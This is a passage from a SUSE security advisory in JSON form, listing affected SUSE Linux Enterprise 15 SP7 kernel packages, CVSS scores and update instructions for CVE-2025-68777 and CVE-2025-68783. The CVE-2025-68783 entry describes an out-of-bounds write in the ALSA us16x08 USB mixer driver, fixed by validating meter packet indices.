"url": "https://www.suse.com/security/cve/CVE-2025-68777"
},
{
"category": "external",
"summary": "SUSE Bug 1256655 for CVE-2025-68777",
"url": "https://bugzilla.suse.com/1256655"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68777"
},
{
"cve": "CVE-2025-68783",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68783"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-mixer: us16x08: validate meter packet indices\n\nget_meter_levels_from_urb() parses the 64-byte meter packets sent by\nthe device and fills the per-channel arrays meter_level[],\ncomp_level[] and master_level[] in struct snd_us16x08_meter_store.\n\nCurrently the function derives the channel index directly from the\nmeter packet (MUB2(meter_urb, s) - 1) and uses it to index those\narrays without validating the range. If the packet contains a\nnegative or out-of-range channel number, the driver may write past\nthe end of these arrays.\n\nIntroduce a local channel variable and validate it before updating the\narrays. We reject negative indices, limit meter_level[] and\ncomp_level[] to SND_US16X08_MAX_CHANNELS, and guard master_level[]\nupdates with ARRAY_SIZE(master_level).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68783",
"url": "https://www.suse.com/security/cve/CVE-2025-68783"
},
{
"category": "external",
"summary": "SUSE Bug 1256650 for CVE-2025-68783",
"url": "https://bugzilla.suse.com/1256650"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
